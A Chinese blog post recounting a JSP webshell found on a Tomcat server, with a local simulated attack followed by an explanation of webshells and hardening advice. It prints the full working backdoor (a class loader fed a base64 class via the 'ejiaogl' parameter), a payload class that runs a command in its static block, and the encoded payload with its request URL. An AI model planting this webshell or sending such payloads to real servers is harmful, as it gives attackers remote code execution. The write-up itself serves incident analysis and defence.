一次被木马攻击的记录

一次被木马攻击的记录描述 最近一个老同学跟我说他部署在阿里云上的系统,在tomcat的目录下出现了一个index.jsp文件,内容大致如下: 我一看发现这不就是一个木马后门文件吗,只需要通过参数ejiaogl传入一个经过

描述

最近一个老同学跟我说他部署在阿里云上的系统,在tomcat的目录下出现了一个index.jsp文件,内容大致如下:

image-20210728190124402.png

我一看发现这不就是一个木马后门文件吗,只需要通过参数ejiaogl传入一个经过base64编码的Class文件,这样就可以解码然后被类加载器加载,而我们知道类被加载的时候是可以执行static代码块的,而这个代码块可以任由攻击者来指定要执行的代码,是非常危险的,为了更加形象我特意做了一个模拟攻击。

模拟攻击

准备木马文件

准备一个Tomcat,直接启动即可,默认访问的是ROOT目录下的index.jsp,准备好以上的木马后门文件直接替换,文件如下:

<%!
//自定义了一个类加载器
class U extends ClassLoader{
    U(ClassLoader c){
        super(c);
    }
    
    public Class g(byte[] b) {
        return this.defineClass(b, 0, b.length);
    }
}
​
public byte[] base64Decoder(String str) throws Exception {
    try {
        Class clazz = Class.forName("sun.misc.BASE64Decoder");
        return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
    } catch (Exception e) {
        //这里还做了一个base64的兼容处理
        Class clazz = Class.forName("java.util.Base64");
        Object decoder = clazz.getMethod("getDecoder").invoke(null);
        return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
    }
}
%>
<%
//接收base64编码的字符
String cls = request.getParameter("ejiaogl");
if(cls != null){
    U u = new U(this.getClass().getClassLoader());
    byte[] b = base64Decoder(cls);
    Class clazz = u.g(b);
    // 这里需要注意一下,ClassLoader方式并不会执行静态代码块,Class.forName可以执行静态代码块的
    clazz.newInstance();
}
%>
<html> <body> <h2>Hello World!</h2> </body> </html>

准备命令类

这里准备一个简单的命令类,打印日志,同时调用本地的计算器:

import java.io.IOException;
public class Script {
​
    static {
        //非法操作
        System.out.println("==Illegal operation==");
        try {
            //打开计算器
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
        }
    }
}

Base64字符串

需要读取Class文件,然后转换成一个Base64编码的字符串:

private static byte[] loadBytes(Class<?> cls) throws IOException {
        String name = cls.getCanonicalName().replaceAll("\.", "/") + ".class";
        InputStream is = ClassLoader.getSystemResourceAsStream(name);
        BufferedInputStream bis = new BufferedInputStream(is);
        try {
            int length = is.available();
            byte[] bs = new byte[length];
            bis.read(bs);
            return bs;
        } finally {
            bis.close();
            is.close();
        }
}
​
// 编码操作
byte[] b = loadBytes(Script.class); 
String base64str = Base64.getEncoder().encodeToString(b);

以上生成的base64字符串如下所示:

yv66vgAAADQALgcAAgEABlNjcmlwdAcABAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAAygpVgEABENvZGUJAAkACwcACgEAEGphdmEvbGFuZy9TeXN0ZW0MAAwADQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwgADwEAFT09SWxsZWdhbCBvcGVyYXRpb249PQoAEQATBwASAQATamF2YS9pby9QcmludFN0cmVhbQwAFAAVAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgoAFwAZBwAYAQARamF2YS9sYW5nL1J1bnRpbWUMABoAGwEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsIAB0BAARjYWxjCgAXAB8MACAAIQEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsHACMBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQANU3RhY2tNYXBUYWJsZQEABjxpbml0PgoAAwApDAAnAAYBAAR0aGlzAQAITFNjcmlwdDsBAApTb3VyY2VGaWxlAQALU2NyaXB0LmphdmEAIQABAAMAAAAAAAIACAAFAAYAAQAHAAAAVwACAAEAAAAWsgAIEg62ABC4ABYSHLYAHlenAARLsQABAAgAEQAUACIAAwAkAAAAEgAEAAAABgAIAAgAEQAJABUACwAlAAAAAgAAACYAAAAHAAJUBwAiAAABACcABgABAAcAAAAvAAEAAQAAAAUqtwAosQAAAAIAJAAAAAYAAQAAAAMAJQAAAAwAAQAAAAUAKgArAAAAAQAsAAAAAgAt

发送请求

在浏览器中访问如下地址:

http://localhost:8080/index.jsp?ejiaogl=以上base64字符串

可以发现会生成相应的日志,同时会调用服务器端上的计算器,简单模拟了一次攻击;

Webshell

告警

当然阿里云是给出告警的,告警内容如下所示:

image-20210729092147869.png

其中提到了index.jsp是一个木马文件,同时指定了木马类型为Webshell;

简介

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。

一方面,webshell被站长常常用于网站管理、服务器管理等等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等; 另一方面,被入侵者利用,从而达到控制网站服务器的目的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马与JSP脚本木马。国内常用的WebShell有海阳ASP木马,Phpspy,c99shell等。

安全防范

  1. 建议用户通过ftp来上传、维护网页,尽量不安装asp的上传程序。
  2. 对asp上传程序的调用一定要进行身份认证,并只允许信任的人使用上传程序。
  3. asp程序管理员的用户名和密码要有一定复杂性,不能过于简单,还要注意定期更换。
  4. 到正规网站下载程序,下载后要对数据库名称和存放路径进行修改,数据库名称要有一定复杂性。
  5. 要尽量保持程序是最新版本。
  6. 不要在网页上加注后台管理程序登陆页面的链接。
  7. 为防止程序有未知漏洞,可以在维护后删除后台管理程序的登陆页面,下次维护时再通过上传即可。
  8. 要时常备份数据库等重要文件。
  9. 日常要多维护,并注意空间中是否有来历不明的asp文件。
  10. 尽量关闭网站搜索功能,利用外部搜索工具,以防爆出数据。
  11. 利用白名单上传文件,不在白名单内的一律禁止上传,上传目录权限遵循最小权限原则。

参考

baike.baidu.com/item/webshe…

www.freebuf.com/articles/we…

总结

对于一个网站来说安全性其实是最重要的,但是对很多程序员来说往往会忽视这个问题,因为很多公司都有专门的安全部门,很多安全问题其实并不会流转到程序员手中;但我觉得我们程序员群体还是很有必要去了解一些安全方面的知识,一方面是保证了我们系统的安全性,另一方面其实也让我们对一些知识点理解的更加透彻,往往给你一种“还可以这么玩”的感觉。

今天的文章一次被木马攻击的记录分享到此就结束了,感谢您的阅读。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/19151.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注